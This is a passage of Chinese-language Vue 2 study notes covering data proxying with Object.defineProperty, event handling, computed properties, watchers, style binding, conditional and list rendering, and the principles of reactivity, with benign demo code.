    2. vm 身上所有的属性及 Vue 原型上所有属性,在 Vue 模板中都可以直接使用。

    webp

    六、数据代理

    011 Object.defineProperty

    Object.defineProperty 是 JavaScript 中的一个方法,允许你精确控制对象属性的行为。它在定义或修改对象属性时提供了额外的控制,如设置属性的可枚举性、可配置性和可写性。与直接赋值方式不同,Object.defineProperty 可以定义“属性描述符”(property descriptors),包括数据描述符和访问器描述符。其基本语法如下:

    1
    Object.defineProperty(obj, prop, descriptor)
    • 参数说明
      • obj:要在其上定义属性的对象。
      • prop:要定义或修改的属性名称(字符串)。
      • descriptor:描述属性行为的对象。
    • 属性描述符
      1. 数据描述符(Data Descriptor):包含值和一些标志,指定属性的行为。常见属性:
        • value:属性的值(默认是 undefined)。
        • writable:布尔值,表示属性是否可被赋值运算符修改(默认是 false)。
        • enumerable:布尔值,表示属性是否可枚举(即能否被 for...inObject.keys 枚举)(默认是 false)。
        • configurable:布尔值,表示属性描述符是否可以被删除或进一步修改(默认是 false)。
      2. 访问器描述符(Accessor Descriptor):定义 getter 和 setter 函数。
        • get:函数,作为属性的 getter(读取属性值时调用)。默认是 undefined
        • set:函数,作为属性的 setter(写入属性值时调用)。默认是 undefined
        • enumerableconfigurable:同数据描述符。

    ​在控制台中测试:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    let number = 18
    let person = {
    name: '张三',
    sex: '男',
    }

    Object.defineProperty(person, 'age', {
    // value: 18,
    // enumerable: true, // 控制属性是否可以枚举,默认值是 false
    // writable: true, //控制属性是否可以被修改,默认值是 false
    // configurable: true, //控制属性是否可以被删除,默认值是false

    // 当有人读取 person 的 age 属性时,get 函数 (getter) 就会被调用,且返回值就是 age 的值
    get() {
    console.log('有人读取 age 属性了')
    return number
    },

    // 当有人修改 person 的 age 属性时,set 函数 (setter) 就会被调用,且会收到修改的具体值
    set(value) {
    console.log('有人修改了 age 属性,且值是', value)
    number = value
    }
    })

    webp

    012 理解数据代理

    数据代理:通过一个对象代理对另一个对象中属性的操作(读/写)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    let obj = {x:100}
    let obj2 = {y:200}

    Object.defineProperty(obj2, 'x', {
    get() {
    return obj.x
    },
    set(value) {
    obj.x = value
    }
    })

    webp

    ​此时,修改 obj2.x 的值也会影响 obj.x 的值。

    013 Vue 中的数据代理

    ​Vue 中用到了数据代理技术,便于开发者编写代码。

    webp

    ​访问/修改 vm.name 的值相当于访问/修改 vm._data.name 的值。

    七、事件处理

    014 事件处理

    事件的基本使用:

    1. 使用 v-on:xxx@xxx 绑定事件,其中 xxx 是事件名;
    2. 事件的回调需要配置在 methods 对象中,最终会在 vm 上;
    3. methods 中配置的函数,不要用箭头函数!否则 this 就不是 vm 了;
    4. methods 中配置的函数,都是被 vue 所管理的函数,this 的指向是 vm 或组件实例对象;
    5. @click="demo"@click="demo($event)" 效果一致,但后者可以传参;

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- <button v-on:click="showInfo">点我提示信息</button> -->
    <button @click="showInfo1">点我提示信息 1(不传参)</button>
    <!-- 如果不需要获取点击事件,则不需要参数 $event -->
    <button @click="showInfo2($event, 66)">点我提示信息 2(传参)</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo1(event) {
    alert('你好啊朋友!')
    },
    showInfo2(event, number) {
    console.log(event, number)
    alert('圣光会制裁你!')
    }
    }
    })
    </script>

    015 事件修饰符 & 017 事件总结

    Vue 中的事件修饰符:

    1. prevent:阻止默认事件(常用);
    2. stop:阻止事件冒泡(常用);
    3. once:事件只触发一次(常用);
    4. capture:使用事件的捕获模式;
    5. self:只有 event.target 是当前操作的元素时才触发事件;
    6. passive:事件的默认行为立即执行,无需等待事件回调执行完毕。

    ​在 JavaScript 中,事件捕获(Event Capturing)和事件冒泡(Event Bubbling)是事件传播的两个阶段,用于描述事件在 DOM 中的传递顺序。它们分别定义了事件在触发时如何从一个元素传递到另一个元素。

    ​事件传播在 DOM 中经过以下三个阶段:

    • 捕获阶段(Capturing Phase):事件从最顶层的祖先元素(通常是 window)开始向下传递,直到目标元素。
    • 目标阶段(Target Phase):事件到达触发该事件的目标元素本身。
    • 冒泡阶段(Bubbling Phase):事件从目标元素开始向上传递,依次经过其祖先元素,直到 window
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    <style>
    * {
    margin-top: 20px;
    }
    .demo1 {
    height: 50px;
    background-color: skyblue;
    }
    .box1 {
    padding: 5px;
    background-color: skyblue;
    }
    .box2 {
    padding: 5px;
    background-color: orange;
    }
    .list {
    width: 200px;
    height: 20px;
    background-color: peru;
    overflow: auto;
    }
    li {
    height: 100px;
    }
    </style>
    </head>
    <body>
    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- 阻止默认事件(常用) -->
    <a href="https://www.baidu.com" @click.prevent="showInfo">点我提示信息</a>
    <!-- 阻止事件冒泡(常用) -->
    <div class="demo1" @click="showInfo">
    <button @click.stop="showInfo">点我提示信息</button>
    </div>
    <!-- 事件只触发一次(常用) -->
    <button @click.once="showInfo">点我提示信息</button>
    <!-- 使用事件的捕获模式 -->
    <div class="box1" @click.capture="showMsg(1)">
    div1
    <div class="box2" @click="showMsg(2)">
    div2
    </div>
    </div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    alert('你好啊朋友!')
    },
    showMsg(msg) {
    alert(msg)
    }
    }
    })
    </script>
    </body>
    </html>
    </html>

    ​事件修饰符可以连着写,如 @click.stop.prevent 表示先阻止冒泡,再阻止默认事件。

    016 键盘事件 & 017 事件总结

    1. Vue 中常用的按键别名:

      • 回车 => enter

      • 删除 => delete(捕获“删除”和“退格”键)

      • 退出 => esc

      • 空格 => space

      • 换行 => tab

      • 上 => up

      • 下 => down

      • 左 => left

      • 右 => right

    2. Vue 未提供别名的按键,可以使用按键原始的 key 值去绑定,但注意要转为 kebab-case(短横线命名)

      • CapsLock 键应转为 caps-lock
    3. 系统修饰键(用法特殊):ctrl、alt、shift、meta

      • 配合 keyup 使用:按下修饰键的同时,再按下其他键,随后释放其他键,事件才被触发

        • @keyup.ctrl.y 必须按下并释放 Ctrl + y 才可以生效。
      • 配合 keydown 使用:正常触发事件。

    4. 也可以使用 keycode 去指定具体的按键(不推荐)

    5. Vue.config.keyCodes.自定义键名 = 键码,可以去定制按键别名

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <input type="text" placeholder="按下回车提示输入" @keyup.enter="showInfo">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    console.log(e.target.value);
    }
    }
    })
    </script>

    ​这段代码将在按下 enter 键后调用 showInfo() 以显示输入框里的值。

    八、计算属性

    018 姓名案例

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<span>{{firstName}}-{{lastName}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    }
    })
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<span>{{fullName()}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    methods: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

    019 计算属性

    计算属性:

    1. 定义:要用的属性不存在,要通过已有属性计算得来。
    2. 原理:底层借助了 objcet.defineproperty 方法提供的 gettersetter
    3. get() 什么时候执行?
      • 初次读取时会执行一次。
      • 当依赖的数据发生改变时会被再次调用。
    4. 优势:与 methods 实现相比,内部有缓存机制(复用),效率更高,调试方便。
    5. 备注:
      • 计算属性最终会出现在 vm 上,直接读取使用即可。
      • 如果计算属性要被修改,那必须写 set() 函数去响应修改,且 set() 中要引起计算时依赖的数据发生改变

    ​使用 computed 实现计算属性。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<input type="text" v-model="fullName"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName: {
    // get() 有什么作用?当有人读取 fullName 时,get() 就会被调用,且返回值就作为 fullName 值;
    // get() 什么时候调用?
    // 1. 初次读取 fullName 时;
    // 2. 所依赖的数据发生变化时。
    get() {
    return this.firstName + '-' + this.lastName
    },
    set(value) {
    const arr = value.split('-')
    this.firstName = arr[0]
    this.lastName = arr[1]
    }
    }
    }
    })
    </script>

    020 计算属性_简写

    ​将 fullName: {get(){}}fullName(){} 简写。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

    九、监视属性

    021 天气案例

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })
    </script>

    022 监视属性

    watch 可以监听哪些属性是否被改变。


    监视属性 watch

    1. 当被监视的属性变化时,回调函数自动调用,进行相关操作
    2. 监视的属性必须存在,才能进行监视!!
    3. 监视的两种写法:
      • new Vue 时传入 watch 配置
      • 通过 v.$watch 监视
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    isHot: {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }
    }
    })
    </script>

    ​也可以这么写:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    Vue.config.productionTip = false  // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })

    v.$watch('isHot', {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    })

    023 深度监视

    深度监视:

    1. Vue 中的 watch 默认不监测对象内部值的改变(一层)
    2. 配置 deep: true 可以监测对象内部值改变(多层)。

    备注:

    1. Vue 自身可以监测对象内部值的改变,但 Vue 提供的 watch 默认不可以
    2. 使用 watch 时根据数据的具体结构,决定是否采用深度监视。

    ​如果某个属性具有多级结构,可用如下方法监视:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    <div id="root">
    <h3>a 的值为:{{numbers.a}}</h3>
    <button @click="numbers.a++">点我让 a + 1</button>
    <h3>b 的值为:{{numbers.b}}</h3>
    <button @click="numbers.b++">点我让 b + 1</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true,
    numbers: {
    a: 1,
    b: 2
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    'numbers.a': {
    handler(){
    console.log('a 值被改变了!')
    }
    }
    }
    })
    </script>

    ​也可通过 deep: true 开启深度监视:

    1
    2
    3
    4
    5
    6
    7
    8
    watch: {
    numbers: {
    deep: true,
    handler(){
    console.log('numbers 值被改变了!')
    }
    }
    }

    024 监视的简写形式

    1
    2
    3
    4
    5
    6
    watch: {
    // 简写
    isHot(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }

    或:

    1
    2
    3
    v.$watch('isHot', function(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    })

    ​这么写的代价是无法配置监视属性。

    025 watch 对比 computed

    computed 和 watch 之间的区别:

    1. computed 能完成的功能,watch 都可以完成。
    2. watch 能完成的功能,computed 不一定能完成,例如:watch 可以进行异步操作。

    两个重要的小原则:

    1. 所被 Vue 管理的函数,最好写成普通函数,这样 this 的指向才是 vm 或组件实例对象。
    2. 所有不被 vue 所管理的函数(定时器的回调函数、ajax 的回调函数等、Promise 的回调函数),最好写成箭头函数,这样 this 的指向才是 vm 或组件实例对象。

    ​使用 watch 实现姓名案例:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三',
    fullName: '张-三'
    },
    watch: {
    firstName(val) {
    this.fullName = val + '-' + this.lastName
    },
    lastName(val) {
    this.fullName = this.firstName + '-' + val
    }
    }
    })
    </script>

    十、绑定样式

    026 绑定 class 样式

    ​绑定 class 样式:

    写法适用范围
    字符串写法样式的类名不确定,需要动态指定
    数组写法要绑定的样式个数不确定、名字也不确定
    对象写法要绑定的样式个数确定、名字也确定,但要动态决定用不用

    ​代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    <!DOCTYPE html>
    <html lang="en">

    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <style>
    .basic {
    width: 400px;
    height: 100px;
    border: 1px solid black;
    }

    .happy {
    border: 4px solid red;
    background-color: rgba(255, 255, 0, 0.644);
    background: linear-gradient(30deg, yellow, pink, orange, yellow);
    }

    .sad {
    border: 4px dashed rgb(2, 197, 2);
    background-color: gray;
    }

    .normal {
    background-color: skyblue;
    }

    .style1 {
    background-color: yellowgreen;
    }

    .style2 {
    font-size: 30px;
    text-shadow: 2px 2px 10px red;
    }

    .style3 {
    border-radius: 20px;
    }
    </style>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>

    <body>
    <div id="root">
    <!-- 绑定 class 样式--字符串写法,适用于:样式的类名不确定,需要动态指定 -->
    <div class="basic" :class="mood" @click="changeMood">{{name}}</div><br><br>
    <!-- 绑定 class 样式--数组写法,适用于:要绑定的样式个数不确定、名字也不确定 -->
    <div class="basic" :class="classArr">{{name}}</div><br><br>
    <!-- 绑定 class 样式--对象写法,适用于:要绑定的样式个数确定、名字也确定,但要动态决定用不用 -->
    <div class="basic" :class="classObj">{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    mood: 'normal',
    classArr: ['style1', 'style2', 'style3'],
    classObj: {
    style1: false,
    style2: true
    }
    },
    methods: {
    changeMood() {
    const arr = ['happy', 'sad', 'normal']
    const index = Math.floor(Math.random() * 3)
    this.mood = arr[index]
    }
    },
    })
    </script>
    </body>

    </html>

    </html>

    ​效果:

    webp

    027 绑定 style 样式

    绑定样式:

    1. class 样式

      写法:class="xxx"xxx 可以是字符串、对象、数组。

      • 字符串写法适用于:类名不确定,要动态获取。
      • 对象写法适用于:要绑定多个样式,个数不确定,名字也不确定。
      • 数组写法适用于:要绑定多个样式,个数确定,名字也确定,但不确定用不用
    2. style 样式(较少用)
      :style="{fontsize:xxx}" 其中 xxx 是动态值。
      :style="[a,b]" 其中 ab 是样式对象。

    1
    2
    3
    4
    <!-- 绑定 style 样式--对象写法 -->
    <div class="basic" :style="styleObj">{{name}}</div><br><br>
    <!-- 绑定 style 样式--数组写法 -->
    <div class="basic" :style="styleArr">{{name}}</div><br><br>

    ​对应的 Vue 实例:

    1
    2
    3
    4
    5
    6
    7
    8
    styleObj: {
    fontSize: '40px',
    color: 'red'
    },
    styleObj2: {
    backgroundColor: 'orange'
    },
    styleArr: [this.styleObj, this.styleObj2]

    十一、条件渲染

    028 条件渲染

    条件渲染:

    1. v-if

      写法:

      • v-if="表达式"
      • v-else-if="表达式”
      • v-else="表达式"

      适用于:切换频率较低的场景。

      特点:不展示的 DOM 元素直接被移除

      注意:v-if 可以和:v-else-ifv-else 一起使用,但要求结构不能被“打断”

    2. v-show

      写法:v-show="表达式"

      适用于:切换频率较高的场景。
      特点:不展示的 DOM 元素未被移除,仅仅是使用样式隐藏掉

    3. 备注:使用 v-if 的时,元素可能无法获取到,而使用 v-show 一定可以获取到。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <div id="root">
    <h2>当前 n 的值是 {{n}}</h2>
    <button @click="n++">点我 n + 1</button>
    <!-- 使用 v-show 做条件渲染 -->
    <h2 v-show="false">欢迎来到{{name}}</h2>
    <h2 v-show="true">欢迎来到{{name}}</h2>
    <!-- 使用 v-if 做条件渲染 -->
    <h2 v-if="false">欢迎来到{{name}}</h2>
    <h2 v-if="1 === 1">欢迎来到{{name}}</h2>
    <!-- v-if、v-else-if、v-else -->
    <div v-if="n === 1">Angular</div>
    <div v-else-if="n === 2">React</div>
    <div v-else>React</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    n: 0
    }
    })
    </script>

    十二、列表渲染

    029 列表渲染

    v-for 指令:

    1. 用于展示列表数据
    2. 语法:v-for="(item, index) in xxx" : key="yyy"
    3. 可遍历:数组、对象、字符串(较少用)、指定次数(较少用)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    <div id="root">
    <!-- 遍历数组 -->
    <h2>人员列表(遍历数组)</h2>
    <ul>
    <li v-for="(p, index) of persons" :key="index">
    {{p.name}}-{{p.age}}
    </li>
    </ul>
    <!-- 遍历对象 -->
    <h2>汽车信息(遍历对象)</h2>
    <ul>
    <li v-for="(value, k) of car" :key="k">
    {{k}}-{{value}}
    </li>
    </ul>
    <!-- 遍历字符串 -->
    <h2>测试遍历字符串</h2>
    <ul>
    <li v-for="(char, index) of str" :key="index">
    {{char}}-{{index}}
    </li>
    </ul>
    <!-- 遍历指定次数 -->
    <h2>测试遍历指定次数</h2>
    <ul>
    <li v-for="(number, index) of 5" :key="index">
    {{number}}-{{index}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    persons: [
    {id: '001', name: '张三', age: 18},
    {id: '002', name: '李四', age: 19},
    {id: '003', name: '王五', age: 20}
    ],
    car: {
    name: '奥迪 A8',
    price: 'price',
    color: '黑色'
    },
    str: 'hello'
    }
    })
    </script>

    webp

    030 key 作用与原理

    面试题:reactvue 中的 key 有什么作用?(key 的内部原理)

    1. 虚拟 DOM 中 key 的作用:key 是虚拟 DOM 对象的标识,当状态中的数据发生变化时,Vue 会根据【新数据】生成【新的虚拟 DOM】随后 Vue 进行【新虚拟 DOM】与【旧虚拟 DOM】的差异比较,比较规则如下:

    2. 对比规则:

    • 旧虚拟 DOM 中找到了与新虚拟 DOM 相同的 key

      • 若虚拟 DOM 中内容没变,直接使用之前的真实 DOM
      • 若虚拟 DOM 中内容变了,则生成新的真实 DOM,随后替换掉页面中之前的真实 DOM
    • 旧虚拟 DOM 中未找到与新虚拟 DOM 相同的 key

      创建新的真实 DOM,随后渲染到到页面。

    1. index 作为 key 可能会引发的问题:

      • 若对数据进行:逆序添加、逆序删除等破坏顺序操作

        会产生没有必要的真实 DOM 更新 ==>界面效果没问题,但效率低。

      • 如果结构中还包含输入类的 DOM:会产生错误 DOM 更新 ==> 界面有问题。

    2. 开发中如何选择 key?:

      • 最好使用每条数据的唯一标识作为 key,比如 id、手机号、身份证号、学号等唯一值。
      • 如果不存在对数据的逆序添加、逆序删除等破坏顺序操作,仅用于渲染列表用于展示,使用 index 作为 key 是没有问题的。

    webp

    webp

    031 列表过滤

    ​将过滤后的结果存在 filPersons 中,查找时在 persons 中进行,这样就不会破坏原数据。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ],
    filPersons: []
    },
    watch: {
    keyword: {
    immediate: true,
    handler(val) {
    this.filPersons = this.persons.filter((p) => {
    return p.name.indexOf(val) !== -1
    })
    }
    }
    }
    })
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    return this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    }
    }
    })
    </script>

    032 列表排序

    ​JavaScript 中 .sort()

    • 前减后,升序排序。
    • 后减前,降序排序。

    ​以此:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <button @click="sortType = 2">年龄升序</button>
    <button @click="sortType = 1">年龄降序</button>
    <button @click="sortType = 0">原顺序</button>
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    sortType: 0, // 0 原顺序,1 降序,2 升序
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    const arr = this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    // 判断一下是否需要排序
    if (this.sortType) {
    arr.sort((p1, p2) => {
    return this.sortType === 1 ? p2.age - p1.age : p1.age - p2.age
    })
    }

    return arr
    }
    }
    })
    </script>

    033 更新时的一个问题 & 034 Vue 监测数据的原理_对象

    Vue 中监测数据变化的核心机制是其响应式系统,它通过 数据劫持依赖收集 实现对数据变化的侦测和响应式更新。以下是其背后的主要原理:


    1. 数据劫持(Object.defineProperty 或 Proxy)

    Vue 2 使用 Object.defineProperty,Vue 3 则切换到更强大的 Proxy

    Vue 2 中的实现:
    • 使用 Object.defineProperty 来拦截对象属性的 读取设置 操作。
    • 对于每个属性,定义了 gettersetter 方法:
      • getter:在属性被访问时触发,进行依赖收集。
      • setter:在属性被修改时触发,通知依赖更新。
    局限性:
    • 只能劫持对象的已有属性,新增属性或删除属性不会触发响应式(需要使用 Vue.set)。
    • 对数组的原生方法(如 pushsplice)需要特殊处理,通过重写这些方法实现响应式。
    Vue 3 中的优化:
    • 使用 Proxy,可以直接监听对象的所有操作(包括新增、删除属性和数组索引的修改)。
    • 更加灵活、性能更高,解决了 Vue 2 的一些局限性。

    2. 依赖收集

    Vue 的响应式系统通过依赖收集和发布订阅模式实现。

    关键组件:
    • Watcher
      • 每个组件或计算属性都有一个 Watcher 实例,负责记录对响应式数据的依赖。
      • 当依赖的数据发生变化时,Watcher 会被触发更新。
    • Dep(Dependency)
      • 一个依赖管理器,用来保存所有依赖某个响应式数据的 Watcher
      • 当数据发生变化时,Dep 会通知相关的 Watcher 进行更新。
    工作流程:
    1. 数据被访问时**(通过 getter)**,当前活动的 Watcher 会被添加到该数据的依赖列表中。
    2. 数据被修改时**(通过 setter)**,触发对应的 Dep 通知所有依赖更新。

